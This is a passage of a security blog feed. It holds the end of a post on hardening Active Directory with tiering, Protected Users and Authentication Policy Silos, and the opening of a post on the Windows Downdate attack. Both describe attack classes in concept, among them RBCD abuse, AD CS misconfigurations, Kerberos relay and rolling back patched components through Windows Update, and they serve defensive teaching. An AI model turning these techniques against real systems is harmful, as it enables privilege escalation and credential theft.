&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Even after every tier-model, Silo, and Protected Users control is correctly deployed, RBCD remains exploitable against any tier-protected service account that is not also in Protected Users -- which, in practice, is most service accounts. Protected Users would close the gap but breaks delegation workflows. The KDC cannot prevent writes to &lt;code&gt;msDS-AllowedToActOnBehalfOfOtherIdentity&lt;/code&gt; because the write is an ACL operation on a directory attribute, not a Kerberos operation. The defence is necessarily layered: ACL the attribute, Silo the target, gMSA the credential material, detect the write at the SIEM.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Physical extraction from a logged-on T0 host.&lt;/strong&gt; The KDC cannot prevent the extraction of credential material from the memory of a machine on which the user is logged on. The credential has to exist somewhere in memory for the user to use it. Credential Guard raises the bar dramatically by placing the credential material in a VBS-protected VTL1 enclave that the VTL0 kernel cannot read, even with a signed driver [@ms-cred-guard]. Remote Credential Guard adds a parallel host-side control for RDP-initiated authentications that redirects Kerberos requests back to the originating client [@ms-rcg]. None of these is a KDC control. The KDC and the host are two layers; both are required.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The on-prem-to-cloud bridge.&lt;/strong&gt; On-prem AD KDC enforcement (Silo membership) and Entra ID Conditional Access enforcement are two independent policy planes by construction. The &lt;a href=&quot;https://paragmali.com/blog/inside-the-primary-refresh-token-the-cryptographic-seam-betw/&quot; rel=&quot;noopener&quot;&gt;Primary Refresh Token&lt;/a&gt; does not carry &lt;code&gt;msDS-AssignedAuthNPolicySilo&lt;/code&gt;. Conditional Access does not consume the Silo binding. Operational alignment is achieved by synchronising the Silo&apos;d group through Microsoft Entra Connect and writing a Conditional Access policy keyed on the synced group. The CA sees the synchronised group; it does not see the Silo. Two planes, both must hold.&lt;/p&gt;
&lt;p&gt;The host-side limit (&quot;Credential Guard moves the bar but cannot eliminate physical extraction&quot;) is the topic of the earlier Credential Guard post in this series; the on-prem-to-cloud limit is the topic of the Conditional Access post. The four-residual recognition in this section is the joint that connects all three.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Closing the on-prem-to-cloud gap requires either a Microsoft product change that projects Silo membership into the Primary Refresh Token, or a third-party policy synthesiser. Neither exists as a product surface in May 2026 -- which is why the §10 Phase 4 workaround (sync the Silo&apos;d group through Microsoft Entra Connect, key the Conditional Access policy on the synced group) is the current production answer. The workaround keeps both planes independent by construction; it does not close the gap, it routes around it.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Supply-chain compromise of T0 software.&lt;/strong&gt; The KDC cannot enforce policy against an agent running as SYSTEM on every domain controller. By construction, the agent is outside the KDC&apos;s authorisation scope; it can rewrite the directory the KDC reads its policy from. The canonical instance is the SolarWinds Orion compromise disclosed in December 2020 (CISA Alert AA20-352A): the attackers used a backdoored Orion update to obtain SYSTEM-level access on management hosts and, per the CISA advisory&apos;s &lt;em&gt;User Impersonation&lt;/em&gt; section, in several documented cases used that access to compromise &quot;the SAML signing certificate using their escalated Active Directory privileges&quot; -- the AD FS / Entra Connect token-signing certificate -- and then &quot;create unauthorized but valid tokens&quot; presented to services that trust SAML tokens from the environment, on T0 systems where the secret material has to exist in memory for the system to do its job [@cisa-aa20-352a]. The KDC saw legitimately-signed tickets and made legitimate policy decisions; the enforcement gap is one layer below, where the software running as the KDC&apos;s neighbour ships compromised code. The closure for this residual is not at the KDC; it is at the software-supply-chain layer (code signing, reproducible builds, attested deployment, and strict T0-software inventory).&lt;/p&gt;

Every Method A deployment requires two emergency-access break-glass accounts that are outside every Silo and outside Protected Users -- see §10 Phase 5 for the operational pattern (offline-stored passwords, monthly use-and-rotate, high-fidelity SIEM detection, RID 500 as the canonical first identity). Microsoft&apos;s RaMP guidance treats this as the *first* step of the privileged-access rollout, before any of the controls in §5 and §6 are deployed [@ms-ramp].
&lt;p&gt;A maximally-correct Method A deployment closes the KDC-plane gaps it was designed to close. Four explicit residuals remain by construction. Three need additional controls (target-ACL hardening, Credential Guard, Conditional Access keyed on the synced group); the fourth is closed at the software-supply-chain layer. The architecture is correct. The world is bigger than the architecture.&lt;/p&gt;
&lt;p&gt;What is the active research, and what does a practitioner do on Monday morning to deploy what is settled?&lt;/p&gt;
&lt;h2&gt;9. Active research lines as of mid-2026&lt;/h2&gt;
&lt;p&gt;The community is not standing still. Five lines of work are visible on the public radar.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Projecting Authentication Policy Silo membership into Entra Conditional Access as a first-class signal.&lt;/strong&gt; The most-named open problem in both SpecterOps research and Microsoft&apos;s own post-NTLM roadmap discussion. Matthew Palko&apos;s October 2023 post &lt;em&gt;Evolution of Windows Authentication&lt;/em&gt; is Microsoft&apos;s institutional acknowledgement that the post-NTLM future is Kerberos plus IAKerb plus Local KDC; the post does not commit to projecting Silo membership into the Primary Refresh Token, but it is the closest reading the community has of a hybrid identity direction [@palko-evol]. IAKerb plus Local KDC is plausibly the substrate that could eventually carry Silo state across the on-prem-to-cloud boundary, but no public Microsoft roadmap entry as of May 2026 announces that projection.&lt;/p&gt;

A community-maintained checklist of Active Directory and Microsoft Entra ID assets, annotated with whether each asset is &quot;Tier Zero&quot; (its compromise grants forest-wide or tenant-wide control), what platform it sits on, how to identify it (typically by SID or by role assignment), and what attack techniques apply by default versus by misconfiguration. The repository is `github.com/SpecterOps/TierZeroTable` with a rendered live view at `specterops.github.io/TierZeroTable` [@tzt-github][@tzt-pages].
&lt;p&gt;&lt;strong&gt;Tier Zero scoping at hybrid-cloud scale.&lt;/strong&gt; Defining the boundary of T0 in a hybrid environment is increasingly difficult. The on-prem T0 set (DCs, AD CS, Entra Connect, DC backup) is enumerable. The cloud-side T0 set (Entra ID Application Administrators with Graph permissions over AD-synced objects, Hybrid Identity Administrators, Global Administrators, Privileged Authentication Administrators) is large, dynamic, and contains roles whose tier-0 status is contested. The SpecterOps Tier Zero Table is the community&apos;s canonical operational answer; its GitHub README is explicit that &quot;the table does not include all Tier Zero assets yet&quot; [@tzt-github]. BloodHound Community Edition is the companion discovery primitive: feed it a directory snapshot, ask it for attack paths to T0, fix the paths [@bloodhound]. The introductory blog series at SpecterOps explains the &quot;Defining the Undefined&quot; definitional work behind the table [@tier-zero-part1].&lt;/p&gt;
&lt;p&gt;If you have never used BloodHound against your own forest, that is the most leveraged single action you can take this month. The tool exposes the attack paths your tier model is supposed to be closing -- and the gaps are almost always somewhere you did not look. The Tier Zero Table is the human-readable companion; BloodHound is the machine-readable one [@bloodhound][@tzt-github].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Continued discovery of ADCS misconfiguration classes (ESC1-ESC8+).&lt;/strong&gt; Schroeder and Christensen&apos;s June 17, 2021 &lt;em&gt;Certified Pre-Owned&lt;/em&gt; whitepaper was the inflection [@cert-preowned-blog][@cert-preowned-pdf]. The original taxonomy catalogued ESC1 through ESC8; ESC9 and several subsequently-disclosed classes have been added since by the SpecterOps team and the wider AD CS research community, with the GhostPack &lt;code&gt;Certify&lt;/code&gt; tool tracking the enumerable classes in its active branch [@ghostpack-certify], and adjacent variants continuing to land in the SpecterOps blog stream. Each class is a tier-bypass primitive that survives Method A&apos;s deployment if the AD CS configuration is itself misconfigured: the KDC sees a legitimately-signed certificate and a legitimate AS-REQ. KB 5014754&apos;s strong-mapping closes the specific CVE-2022-26923 (&quot;Certifried&quot;) class; template hardening (manager-approval, no-CT, no-enrollee-supplies-subject) addresses several other classes [@kb-5014754].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Kerberos relay primitives.&lt;/strong&gt; The KrbRelay family of attacks, anchored to James Forshaw&apos;s October 2021 Project Zero research on cross-protocol Kerberos relaying [@krb-relay-pz] and operationalised in the &lt;code&gt;cube0x0/KrbRelay&lt;/code&gt; tool released shortly thereafter [@cube0x0-krbrelay], exploits the absence of channel binding in some pre-authentication flows. Silos enforce on the source-machine identity &lt;em&gt;as presented in the AS-REQ&lt;/em&gt;; an attacker who can cause a different machine to issue an AS-REQ on the attacker&apos;s behalf and relay it can satisfy the Silo Policy. FAST (RFC 6113) provides the cryptographic primitive for channel binding [@rfc-6113]; Microsoft&apos;s Kerberos armoring uses FAST, and a Silo Policy can be configured to require FAST armoring. The open deployment question is whether FAST armoring becomes the universal default in legacy environments. The Palko post on the post-NTLM Windows authentication roadmap is the closest Microsoft has come to addressing the deployment direction publicly [@palko-evol].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Service-account placement: Protected Users vs. Silo-only.&lt;/strong&gt; The unsolved sub-problem inside the RBCD residual. Service accounts have two failure modes: they cannot be placed in Protected Users without breaking their delegation workflows, and they cannot be left out without leaving an RBCD-attack primitive against tier-protected service accounts that have writable &lt;code&gt;msDS-AllowedToActOnBehalfOfOtherIdentity&lt;/code&gt;. The current best partial result is composite: Group Managed Service Accounts plus a tight Silo Policy plus an ACL on the delegation attribute plus a SIEM rule on attribute writes. The architectural answer would be an extension to Protected Users that retains delegation-as-source but refuses NTLM, RC4, and DES. No such extension appears on Microsoft&apos;s public roadmap as of May 2026 [@ms-pu-current][@ms-mdi].&lt;/p&gt;
&lt;p&gt;The settled controls are deployable. The open research is real and has not been closed. Five years from now, the Silo plane will likely still be the operational answer, with the residuals closed by different parts of the stack. What does that look like to a practitioner reading this on a Monday morning?&lt;/p&gt;
&lt;h2&gt;10. A six-phase playbook for deploying Method A this quarter&lt;/h2&gt;
&lt;p&gt;A staged playbook. The phases are ordered for safety: each phase reduces the blast radius of the next, and the first phase is the most important and the most often skipped.&lt;/p&gt;
&lt;h3&gt;Phase 0: Inventory Tier 0&lt;/h3&gt;
&lt;p&gt;Use the SpecterOps Tier Zero Table as the starting checklist [@tzt-github][@tzt-pages]. Pair it with BloodHound Community Edition to discover the attack paths your environment actually has into the T0 set [@bloodhound]. The Tier Zero Table is intentionally incomplete -- treat it as the floor, not the ceiling -- and add the assets specific to your environment: any service account whose compromise grants write access to a DC, any backup system that can restore a DC&apos;s NTDS.dit, any monitoring system that can run code on a DC. Sean Metcalf&apos;s body of work on secure workstation baselines is the canonical operator-grade reading for this phase [@metcalf-p3299][@metcalf-p1738].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Do not start with Silo creation. Start with the T0 inventory. Every subsequent phase depends on a defensible list of what T0 contains. A T0 asset missed by the inventory is a T0 asset that is not Silo&apos;d, not in Protected Users, and not behind a Conditional Access policy on the cloud side. Phase 0 is the single most-skipped step in failed Method A deployments and the single highest-value step in successful ones.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Phase 1: Create the T0 Admins Silo and Policy in audit mode&lt;/h3&gt;
&lt;p&gt;Create the &lt;code&gt;msDS-AuthNPolicySilo&lt;/code&gt; named &quot;T0 Admins&quot; and its referenced &lt;code&gt;msDS-AuthNPolicy&lt;/code&gt; named &quot;T0 Source Restriction.&quot; Set &lt;code&gt;msDS-AuthNPolicySiloEnforced=FALSE&lt;/code&gt; to start in audit mode [@ms-aps]. Place a single test admin account in Protected Users and assign it to the Silo. Set the Policy&apos;s &lt;code&gt;UserAllowedToAuthenticateFrom&lt;/code&gt; SDDL to a SID set containing exactly one PAW. Confirm that authentication from the PAW succeeds, that authentication from a tier-2 workstation generates the expected audit event (&lt;code&gt;Authentication Policy Silo&lt;/code&gt; audit failure in the Security log), and that nothing else in the environment breaks. Once the audit window is clean, flip the Silo to enforced mode. The KDC now returns &lt;code&gt;KDC_ERR_POLICY&lt;/code&gt; for any AS-REQ from outside the allowed-from set [@ms-kile].&lt;/p&gt;
&lt;h3&gt;Phase 2: Catalogue every delegation relationship in the directory&lt;/h3&gt;
&lt;p&gt;Enumerate every account with &lt;code&gt;msDS-AllowedToDelegateTo&lt;/code&gt; set, every object with &lt;code&gt;msDS-AllowedToActOnBehalfOfOtherIdentity&lt;/code&gt; set, and every account with the legacy &lt;code&gt;TrustedForDelegation&lt;/code&gt; UAC bit. For each T0-adjacent service account, decide whether the workflow can survive Protected Users membership. If yes, enrol the account and move on. If no -- which will be the common answer -- create a &quot;T0 Services&quot; Silo with a tight &lt;code&gt;UserAllowedToAuthenticateFrom&lt;/code&gt; Policy, bind the account to the Silo, deny &lt;code&gt;WriteProperty&lt;/code&gt; on &lt;code&gt;msDS-AllowedToActOnBehalfOfOtherIdentity&lt;/code&gt; for everyone but directory administrators, and audit Defender for Identity for the corresponding alerts [@ms-mdi]. The composite defence is the current best partial answer to the RBCD residual.&lt;/p&gt;
&lt;p&gt;Group Managed Service Accounts (gMSA) are the preferred new-service-account primitive for the §6 reference deployment. The Microsoft Key Distribution Service (&lt;code&gt;kdssvc.dll&lt;/code&gt;) on the domain controller derives the account&apos;s password from a domain-wide root key plus a per-account key identifier and rotates it on a configurable schedule; service hosts retrieve the current password through an ACL-controlled flow [@ms-gmsa-overview]. The cryptographic-rotation property -- not Silo membership -- is what closes the AS-REP roasting primitive in practical timeframes for a service-account workflow that the §6 PullQuote forbids from enrolling in Protected Users. Microsoft&apos;s &lt;em&gt;How to Configure Protected Accounts&lt;/em&gt; page covers the wider per-account migration shape for legacy non-gMSA services [@ms-config-pa].&lt;/p&gt;
&lt;h3&gt;Phase 3: Roll the human T0 administrators into Protected Users in batches&lt;/h3&gt;
&lt;p&gt;Audit the longest-running tier-0 administrative task in your environment &lt;em&gt;before&lt;/em&gt; you enrol anyone. Forest backups, replication health checks, schema upgrade dry-runs, DC promotions, and emergency operational procedures sometimes exceed four hours; the Protected Users 240-minute non-renewable TGT cap will silently re-authenticate or fail outright when they do [@ms-config-pa]. Enrol in batches of two or three administrators at a time; keep the previous batch in for at least two weeks before adding the next. Microsoft&apos;s &lt;em&gt;How to Configure Protected Accounts&lt;/em&gt; page lays out the staged enrolment shape [@ms-config-pa].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The 240-minute non-renewable TGT cap on Protected Users members is the single most common cause of failed pilot deployments. Tasks that ran fine for years quietly fail at the 4-hour mark, or worse, re-authenticate against a different identity that has lower privilege. Audit your longest-running T0 operations against the cap &lt;em&gt;before&lt;/em&gt; enrolling humans; document workarounds (&lt;code&gt;runas&lt;/code&gt; for long tasks; batch jobs running under gMSAs with a per-Policy lifetime configured deliberately) before the enrolment, not after.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Phase 4: Project the T0 group into Entra Conditional Access&lt;/h3&gt;
&lt;p&gt;Sync the T0 Admins group through Microsoft Entra Connect. Write a Conditional Access policy that requires phishing-resistant MFA (FIDO2, Windows Hello for Business, or certificate-based authentication) for that group, plus a compliant device, plus a known-good location if the threat model justifies it [@ms-pim]. Document explicitly that the CA is keyed on the synchronised group, not on the Silo binding; the two enforcement planes are independent by construction. The Entra side is the topic of the Conditional Access post in this series for the deeper treatment.&lt;/p&gt;
&lt;p&gt;For the cloud-side treatment of Conditional Access policy shapes -- compliant device, phishing-resistant MFA grant control, location and risk conditions -- see the Conditional Access post in this series. The CA policy keyed on the synced T0 group is what holds the two-plane workaround together.&lt;/p&gt;
&lt;h3&gt;Phase 5: Break-glass&lt;/h3&gt;
&lt;p&gt;Two emergency-access accounts that are &lt;em&gt;outside&lt;/em&gt; every Silo, &lt;em&gt;outside&lt;/em&gt; Protected Users, with passwords stored offline in a tamper-evident envelope held by two separate people, with a documented monthly use-and-rotate procedure, and with high-fidelity SIEM detection on every authentication attempt. The cost of the break-glass pair is the deliberate, audited counter-balance to the rest of the architecture. Microsoft&apos;s RaMP guidance treats this as the &lt;em&gt;first&lt;/em&gt; step of the privileged-access rollout [@ms-ramp]. The built-in domain Administrator (RID 500) is the natural canonical first break-glass identity because it is exempt from Authentication Policy enforcement even when assigned to a Silo [@ms-pu-current].&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s RaMP page lists &quot;Emergency access accounts&quot; as the first initiative of the entire Rapid Modernization Plan, ahead of Entra PIM and the on-prem controls [@ms-ramp]. The ordering is deliberate: a privileged-access deployment that locks itself out before it has secured the recovery path is worse than no deployment at all.&lt;/p&gt;

The Active Directory PowerShell module exposes the cmdlets directly. The skeleton below creates a Policy and a Silo in audit mode, then assigns one user. Adapt the SDDL to your PAW computer SIDs before running.&lt;p&gt;&lt;code&gt;New-ADAuthenticationPolicy -Name &quot;T0 Source Restriction&quot; -UserTGTLifetimeMins 240 -UserAllowedToAuthenticateFrom &apos;O:SYG:SYD:(XA;OICI;CR;;;WD;(@USER.ad://ext/AuthenticationSilo == &quot;T0 Admins&quot;))&apos;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;@USER.ad://ext/AuthenticationSilo&lt;/code&gt; token in that SDDL is evaluated at AS-REQ time against the &lt;em&gt;source machine&apos;s&lt;/em&gt; user-token claims, not against the requesting user&apos;s own Silo binding -- the Policy admits the requesting user only from devices whose computer accounts are themselves Silo members of &quot;T0 Admins&quot; (typically the T0 PAW set). The token&apos;s evaluation context is the source-device side of the request, which is the practical encoding of the source-machine pinning Method A relies on [@ms-aps].&lt;/p&gt;
&lt;p&gt;&lt;code&gt;New-ADAuthenticationPolicySilo -Name &quot;T0 Admins&quot; -Enforce:$false -UserAuthenticationPolicy &quot;T0 Source Restriction&quot;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;Set-ADAccountAuthenticationPolicySilo -Identity alice.da -AuthenticationPolicySilo &quot;T0 Admins&quot;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;Add-ADGroupMember -Identity &quot;Protected Users&quot; -Members alice.da&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Run in audit mode (Enforce:false) for a full audit cycle, validate the Security log for &lt;code&gt;Authentication Policy Silo&lt;/code&gt; events, then flip to enforced mode. The official PowerShell-cmdlet documentation is on the Microsoft Learn AD-cmdlet pages; the relevant deployment shape is described in &lt;em&gt;How to Configure Protected Accounts&lt;/em&gt; [@ms-config-pa].
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;You have a playbook. You also have a set of questions readers are now going to ask. Here they are.&lt;/p&gt;
&lt;h2&gt;11. Frequently asked questions&lt;/h2&gt;


No -- service accounts must not be (see §6&apos;s canonical Microsoft Learn PullQuote), and workstation users do not need to be (the Silo plane and Credential Guard handle their threat model). For human administrators, the answer is &quot;yes, in batches, after testing&quot; -- see §10 Phase 3&apos;s Callout on the 4-hour TGT cap, which is the single most common pilot break.


Indirectly. Kerberoasting per se is defeated by AES-only enforcement and high-entropy passwords. Protected Users forbids RC4 and DES for its members, so a Silo&apos;d and Protected human administrator cannot be roasted with the public RC4-dependent tooling. For service accounts that cannot be Protected, the defence is explicit AES enforcement via `msDS-SupportedEncryptionTypes` plus gMSA-managed high-entropy passwords [@ms-config-pa]. Defender for Identity surfaces accounts that still use RC4 [@ms-mdi].


No. Two independent planes. The PRT does not carry `msDS-AssignedAuthNPolicySilo`, and Conditional Access does not consume it. The standard alignment is to synchronise the Silo&apos;d group through Microsoft Entra Connect and write a CA policy keyed on the synced group. The CA sees the synchronised group, not the Silo. Both planes must hold for a hybrid privileged identity to be safe [@ms-eam][@palko-evol]. Closing the gap requires either a Microsoft product change or a third-party policy synthesiser; neither exists as a product surface in May 2026.


Subtly. ESAE -- the Red Forest pattern -- was retired as a mainstream recommendation on December 15, 2020 [@ms-esae-retire]. The tier model as an *idea* was folded into the Enterprise Access Model [@ms-eam]; the directory-level controls (Authentication Policy Silos, Protected Users) remain Microsoft&apos;s recommended on-prem enforcement layer. New ESAE deployments are not recommended outside air-gapped OT, ICS, and SCADA scenarios; existing ESAE deployments operating as designed have no urgency to retire.


KB 2871997 is the May 13, 2014 down-level backport of Protected Users client-side honoring and Authentication Policy / Silo client-side support to Windows 7, Windows 8, Server 2008 R2, and Server 2012 [@kb-2871997]. It is NOT the introduction of those features -- the introduction is Windows Server 2012 R2 GA on October 18, 2013 [@save-date-blog][@ms-pu-legacy]. The October 14, 2014 revision additionally shipped Restricted Admin Mode for RDP, which has its own cautionary history as the canonical example of a defence that became its own inverse [@kfalde-restricted-admin][@ms-rcg].


The schema supports it -- a Silo&apos;s `msDS-ComputerAuthNPolicy` link carries a Computer Policy with its own Computer TGT Lifetime, and DCs are valid Silo members in principle [@ms-aps]. The operational pattern doesn&apos;t do that, for two reasons. First, DCs are themselves the authentication authority, and Microsoft Learn&apos;s Authentication Policies and Silos page explicitly warns against changing Computer TGT Lifetime on DC class accounts because shortened TGT lifetimes disrupt replication and other DC-to-DC operations (&quot;It is not recommended to change this setting&quot; [@ms-aps]). Second, the Silo plane is built for the accounts that authenticate *to* DCs -- T0 admins, the AD CS computer account, the Entra Connect server -- where source-machine pinning is the high-impact control. Silo the accounts that authenticate to your DCs; protect the DCs themselves with the orthogonal directory primitives (KDC service-account configuration, Defender for Identity sensor deployment, code-signing and update management, physical isolation). The Tier Zero Table and BloodHound surface the DC-adjacent accounts that need Silo membership [@tzt-github][@bloodhound].

&lt;p&gt;The directory now has the answer it lacked for sixteen years. Three controls, one ship, plus thirteen years of operational discipline to compose them, plus an explicit acknowledgement of the four residuals the KDC cannot close by construction. On the Tuesday morning in April 1997 when Paul Ashton posted his patched &lt;code&gt;smbclient&lt;/code&gt; to NTBugtraq, no one in the AD product group could have written this article. They can now -- and the KDC, keyed on directory state, is the layer they would write it from.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;ad-tiering-protected-users-silos&quot; keyTerms={[
  {&quot;term&quot;: &quot;Pass-the-Hash&quot;, &quot;definition&quot;: &quot;Credential-theft technique that uses an account&apos;s NT hash as the long-term key. The NTLM protocol cannot distinguish the legitimate password-holder from anyone holding the hash.&quot;},
  {&quot;term&quot;: &quot;Protected Users&quot;, &quot;definition&quot;: &quot;Global security group (well-known RID 525) introduced in Windows Server 2012 R2. Members get a non-configurable credential-restriction set: no NTLM, no DES or RC4 in Kerberos, no delegation, no cached offline-sign-in verifier, 240-minute non-renewable TGT cap.&quot;},
  {&quot;term&quot;: &quot;Authentication Policy Silo&quot;, &quot;definition&quot;: &quot;The msDS-AuthNPolicySilo container object. Enumerates the user, computer, and service accounts that share a set of restrictions, and references one or more Authentication Policies whose rules apply to its members.&quot;},
  {&quot;term&quot;: &quot;Authentication Policy&quot;, &quot;definition&quot;: &quot;The msDS-AuthNPolicy rules object. Carries the TGT lifetime cap, the allowed-from SDDL on source-machine identity, allowed-to delegation rules, claim transformations, and optional FAST armoring requirement.&quot;},
  {&quot;term&quot;: &quot;KDC (Key Distribution Center)&quot;, &quot;definition&quot;: &quot;The Kerberos authentication service that handles AS-REQ (TGT issuance) and TGS-REQ (service-ticket issuance). On Windows, every DC runs a KDC; the KDC reads policy from the directory at request time.&quot;},
  {&quot;term&quot;: &quot;PAC (Privilege Attribute Certificate)&quot;, &quot;definition&quot;: &quot;Microsoft authorisation-data structure carried inside Kerberos TGTs and service tickets. PAC_LOGON_INFO.GroupIds encodes Protected Users membership via well-known SID 525.&quot;},
  {&quot;term&quot;: &quot;Tier 0 (T0)&quot;, &quot;definition&quot;: &quot;The control plane: domain controllers, AD CS root CAs, Entra Connect servers, DC backup systems, and any system whose compromise grants forest-wide control.&quot;},
  {&quot;term&quot;: &quot;Enterprise Access Model (EAM)&quot;, &quot;definition&quot;: &quot;Microsoft&apos;s December 15, 2020 meta-architecture for privileged-access. Segments by access level (privileged-access, management, data/workload, user/app) rather than by forest boundary, and incorporates Entra ID admin roles as first-class control-plane objects.&quot;},
  {&quot;term&quot;: &quot;RBCD (Resource-Based Constrained Delegation)&quot;, &quot;definition&quot;: &quot;Constrained delegation configured by writing msDS-AllowedToActOnBehalfOfOtherIdentity on the target. Governed by the target object&apos;s ACL, not by the Silo plane; remains exploitable against tier-protected service accounts that cannot be in Protected Users.&quot;},
  {&quot;term&quot;: &quot;Tier Zero Table (SpecterOps)&quot;, &quot;definition&quot;: &quot;Community-maintained checklist of AD and Entra ID assets that must be enclosed in the T0 control plane. Intentionally incomplete; designed to be the floor of the inventory, not the ceiling.&quot;}
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>active-directory</category><category>kerberos</category><category>authentication-silos</category><category>protected-users</category><category>tiering</category><category>credential-theft</category><category>pass-the-hash</category><category>privileged-access</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Windows Downdate: When the Update Itself Is the Attack</title><link>https://paragmali.com/blog/windows-downdate-when-the-update-itself-is-the-attack/</link><guid isPermaLink="true">https://paragmali.com/blog/windows-downdate-when-the-update-itself-is-the-attack/</guid><description>How Alon Leviev turned Windows Update into a downgrade primitive, rolling fully-patched Windows 11 back to vulnerable VBS components while every signature still verified.</description><pubDate>Sat, 23 May 2026 00:00:00 GMT</pubDate><content:encoded>
**Windows Update was designed to verify the integrity of files, not the monotonicity of versions.** In August 2024 at Black Hat USA, Alon Leviev (SafeBreach Labs) showed that an Administrator-context process can hijack Windows Update&apos;s own post-reboot servicing path by writing a single registry value, and use it to roll fully-patched Windows 11 system files back to historically vulnerable but legitimately Microsoft-signed versions [@safebreach-2024-aug]. Once the components VBS, HVCI, Credential Guard, and the Secure Kernel rely on have been replaced by their own past selves, the protections built on top of them quietly fail open. Microsoft has shipped a per-component revocation policy (`SkuSiPolicy.p7b` in KB5042562) and the substantive CVE-2024-38202 fix (KB5044284, October 2024), but maintains that the underlying primitive is not a security vulnerability because the Windows Security Servicing Criteria does not enumerate Administrator-to-kernel as a security boundary [@kb5042562; @kb5044284; @safebreach-2024-oct; @msft-servicing-criteria].
&lt;h2&gt;1. &quot;Up to Date&quot; Means Less Than It Says&lt;/h2&gt;
&lt;p&gt;Imagine a Windows 11 machine that has installed every cumulative update Microsoft has released this year. Settings says &lt;strong&gt;You&apos;re up to date&lt;/strong&gt;. The Authenticode signature on every system DLL validates against Microsoft&apos;s root. HVCI is on. Credential Guard is on. VBS is on with the UEFI lock engaged. Disk Cleanup is empty. The Servicing Stack reports a healthy state. And somewhere in &lt;code&gt;C:\Windows\System32&lt;/code&gt;, a two-year-old &lt;code&gt;ci.dll&lt;/code&gt; is happily enforcing the code-integrity policy on a kernel that thinks it is current.&lt;/p&gt;
&lt;p&gt;This machine was the demo on the SafeBreach blog in October 2024, and it is not a misconfiguration [@safebreach-2024-oct; @thehackernews-downdate]. The version on disk is &lt;code&gt;10.0.22621.1376&lt;/code&gt;, a build from before May 2024, when Microsoft patched Gabriel Landau&apos;s &lt;em&gt;False File Immutability&lt;/em&gt; race in &lt;code&gt;ci.dll&lt;/code&gt; [@elastic-ffi; @landau-itsnotasecurityboundary-repo]. The signature on that older build is legitimately Microsoft&apos;s. The hash matches a Microsoft-issued security catalog. Windows is perfectly happy to load it.&lt;/p&gt;
&lt;p&gt;The Driver Signature Enforcement policy, the &lt;a href=&quot;https://paragmali.com/blog/authenticode-and-catalog-files-the-crypto-foundation-under-w/&quot; rel=&quot;noopener&quot;&gt;Authenticode chain&lt;/a&gt;, the catalog trust path, the WinSxS component store, and the post-reboot servicing engine were all built on the same shared assumption. Windows Downdate is what happens when you stop assuming it.&lt;/p&gt;
&lt;p&gt;The author of that demo is Alon Leviev, a researcher then at SafeBreach Labs. On August 7, 2024 he presented &lt;em&gt;Windows Downdate: Downgrade Attacks Using Windows Updates&lt;/em&gt; at Black Hat USA, followed by a more detailed walk-through at DEF CON 32 four days later [@safebreach-2024-aug; @bh-leviev-slides].&lt;/p&gt;
&lt;p&gt;The technique he published does one thing and does it well: it takes Administrator-level access on a fully-patched Windows machine and converts it into Microsoft-signed historical code, running in the kernel, inside the Secure Kernel, inside the hypervisor, inside Credential Guard&apos;s isolated user-mode process. The OS does not notice. EDR does not notice. &lt;code&gt;sfc /scannow&lt;/code&gt; does not notice. Settings reports the system as patched, because in every sense Windows can express, it is.&lt;/p&gt;
&lt;p&gt;Leviev framed his goal as a four-property objective. The attack had to be &lt;strong&gt;undetectable&lt;/strong&gt; to endpoint security, &lt;strong&gt;invisible&lt;/strong&gt; to the user, &lt;strong&gt;persistent&lt;/strong&gt; across future updates, and &lt;strong&gt;irreversible&lt;/strong&gt; by repair tooling. The rest of this article will measure each piece of the attack against those four properties, but it is worth pausing on what they imply. They do not require defeating a single Microsoft mitigation. They require defeating &lt;em&gt;all of them simultaneously&lt;/em&gt;, and Leviev&apos;s claim is that one registry write is enough.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Every Microsoft mitigation since 2015 implicitly assumed that the OS being protected was the current one. None of them declared &quot;the current one&quot; as a security boundary.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;That sentence is the spine of the article. To understand why nobody noticed for so long, we have to start somewhere unexpected: with a TLS bug from 2014.&lt;/p&gt;
&lt;h2&gt;2. A History of Downgrade Attacks (Before Windows Knew the Name)&lt;/h2&gt;
&lt;p&gt;If you can convince a system to do something old, you can convince it to do something dangerous. Bodo Möller, Thai Duong, and Krzysztof Kotowicz figured that out first, at least in the public literature. In October 2014 their &lt;em&gt;This POODLE Bites&lt;/em&gt; advisory described an attack on the way browsers retry failed TLS handshakes [@google-poodle-pdf; @nvd-poodle]. A man-in-the-middle could induce a connection failure, the browser would silently retry at a lower protocol version, and the server would accept SSL 3.0, where a CBC padding oracle let the attacker decrypt session cookies one byte at a time. SSL 3.0 had been broken for years, but it remained in the negotiation envelope for backwards compatibility, and the negotiation envelope was where the protocol was weakest.&lt;/p&gt;
&lt;p&gt;POODLE established the pattern. A protocol that retains legacy modes for compatibility creates a downgrade primitive &lt;em&gt;unless the protocol explicitly enforces &quot;highest version available.&quot;&lt;/em&gt;&lt;/p&gt;
